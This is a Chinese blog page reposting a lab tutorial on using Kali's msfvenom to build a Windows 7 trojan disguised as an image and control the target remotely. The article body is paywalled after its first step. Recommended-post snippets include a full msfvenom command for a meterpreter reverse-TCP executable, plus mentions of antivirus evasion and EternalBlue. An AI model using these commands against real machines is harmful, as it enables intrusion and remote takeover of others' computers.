漏洞复现：使用Kali制作木马程序

最新推荐文章于 2025-10-09 17:49:30 发布

转载

最新推荐文章于 2025-10-09 17:49:30 发布 · 3.6k 阅读

26 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/redHskb/p/11611945.html

文章标签：

#运维 #操作系统 #网络

本文详细介绍了如何在Kali Linux环境中利用msfvenom创建针对Win7 64位系统的木马文件，包括设置payload、监听模块、伪装成图片的exe文件的制作，并最终实现对目标系统的远程控制。

漏洞复现：使用Kali制作木马程序

攻击机：Kali2019

靶机：Win7 64位

攻击步骤：

1.打开Kali2019和Win7 64位虚拟机，确定IP地址在一个网段

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

dingbai2663

关注关注

0
点赞
踩
26

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

kali生成木马

Massimo__JAVA的博客

04-25

2400

攻击机：kali 192.168.116.128受害机：win7 192.168.116.124目标：使用kali。

靶机测试，kali生成windows木马程序

2301_76361674的博客

05-03

1676

仅用于靶机测试！永恒之蓝：通过系统已有漏洞进行攻击，获得后门权限木马：通过将后门放到靶机上，获得权限。

参与评论您还未登录，请先登录后发表或查看评论

使用Kali Linux系统生成木马病毒并实现远程控制计算机

2401_84578953的博客

09-21

3600

木马生成木马病毒并实现远程控制计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码通常有控制端和被控制端两个可执行程序。它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种者电脑的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至还可以远程操控被种者的电脑。我将会详细的介绍使用Kali Linux系统生成木马，并用它远程控制一台处在外网的物理计算机。**使用工具**VMware Workstation Pro 16（虚拟机）Kali Linux 2021（系统）

一文带你进入黑客的世界：Kali Linux如何使用Metasploit渗透测试工具生成病毒木马？

最新发布

wholeliubei的博客

10-09

997

本文介绍了使用Metasploit框架进行网络安全测试的方法，重点演示了针对Windows系统的"永恒之蓝"漏洞攻击流程。文章首先说明了获取IP地址后通过端口扫描发现漏洞服务的重要性，接着详细讲解了Metasploit的基本功能和使用步骤，包括模块选择、参数配置和攻击执行等关键环节。通过实验展示了如何利用该漏洞获取目标系统权限，并介绍了meterpreter后渗透工具的基本命令。最后强调本文内容仅用于合法安全研究，严禁用于非法用途。

Kali生成windows木马程序

qq_51950323的博客

09-07

1万+

此文章为kali生成windows木马程序，进行的后渗透测试。此操作仅供虚拟机测试，请勿使用于非法途径。

Tomcat漏洞复现

ming20211016的博客

11-12

1236

进入终端：docker exec -it 76738703b7b2 /bin/bash或者/bin/sh #/bin/bash打开一个终端窗口，exit指令退出终端，但是docker容器内容一般不会安装额外的软件，所以导致大量的指令是用不了的，比如ifconfig、ps、ip addr等。这样还是麻烦，有没有一种办法，同时启动多个容器呢？有了docker-compose.yml配置文件，可以使用docker-compose up -d 指令按照配置文件里的容器和配置项去下载，执行相应的容器。

漏洞复现:CVE-2018-15982(Adobe Flash 0day)

RongChun的博客

01-04

755

漏洞概述： 2018年11月29日，360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动，通过一份俄文内容的医院员工问卷文档，携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序，该漏洞（CVE-2018-15982）允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码，从而获取对系统命令行的访问权限。受影响的版本： Adobe Flash Player...

常见中间件漏洞复现之【Tomcat】！

muyuchen110的博客

08-06

1777

Tomcat介绍JavaWeb程序的装载，是配置JSP（Java Server Page）和JAVA系统必备的⼀款环境。在历史上也披露出来了很多的漏洞 , 这⾥我们讲⼏个经典的漏洞复现漏洞描述由默认值设置为false），攻击者将有可能可通过精⼼构造的攻击请求数据包向服务器上传包含任意代码的 JSP ⽂件，JSP⽂件中的恶意代码将能被服务器执⾏。导致服务器上的数据泄露或获取服务器权限。漏洞原理⽣，（需要允许put请求） , 攻击者可以利⽤PUT⽅法通过精⼼构造的数据包向存在漏洞的服务器⾥⾯上。

网络安全技术新手入门:利用Kali Linux生成简单的远程控制木马

weixin_56154577的博客

01-08

8062

本文对木马的生成过程讲的比较详细，适合对网络安全技术感兴趣的小伙伴们，读完本文之后，读者可以对木马的形成、传播、对靶机的控制流程有一个逻辑性的理解

永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令

Fengsheng96的博客

08-10

2807

环境部署靶机：win7 工具机：kali,nessus 攻击步骤 1、nessus扫描靶机根据扫描结果查看漏洞

kali msfvenom生成木马

qq_33391644的博客

02-06

6549

在kali2.0的环境上，因为msfpayload没有了，被整合进了msfvenom，所以这就只写一些关于msfvenom的东西。这里就只是记录下生成一个程序的过程。 msfvenom msfvenom是msfpayload,msfencode的结合体，可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 1.首先还是得打开postgresqlro...

Kali Linux使用Metasploit生成木马入侵安卓系统

简介

02-24

8926

前言，前言这是我最难想出来的对，这是我最后一篇文章，周一我们开学了，漏洞实战怕实现不了，至少放假可以更文章，我们只放一天，提示：以下是本篇文章正文内容，下面案例可供参考时间不够了，所以不做演示了,所以再见。

kali使用msf简单制作木马

热门推荐

m0_53820621的博客

11-15

1万+

命令: 废话不多说，直接上命令： msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 -f exe -o /root/csdn.exe 命令分解： msfvenom #使用msf中msfvenom模块 -a #指定架构（x86指32位，x64为64位，建议x86，因为x64兼容x86，在不知道目标机架构的情况下x86更为合适） -p #指定p

【记录】kali制作绕过火绒检测的木马（仅通过MSF的方式）

jennycisp的博客

12-26

3460

apt-get update报错关于kali2019.4的更新源（任意选择其中一组就可用，我选的清华源）#清华大学#阿里云#中科大#浙大最后最后，上面安装的虚拟机在 apt-get update 之后的 apt-get upgrade报错，原因找了很久，发现可能是因为kali版本和VMware版本相差太远以至于update的包安装覆盖之类的问题导致报错。-----然后我重新下载了iso镜像，kali2021.4版本。结果upgrade还是有问题，甚至还upgrade之后莫名其妙连不上网络。

使用kali渗透工具msfvenom生成远控木马

m0_74981852的博客

06-04

3408

在杀毒软件中可以找回文件并信任改文件。右键复制到自己的电脑的一个位置，注意。1.打开kali终端>输入。2.1查看生成的后门文件。6.对目标主机进行攻击。运行之后，去目标主机。

复现|使用Kali生成木马，渗透Windows系统

Maricopig的博客

05-13

3646

简单复现了使用kali中的msfvenom工具生成木马文件，并在靶机中执行后，展示后渗透阶段可操作内容。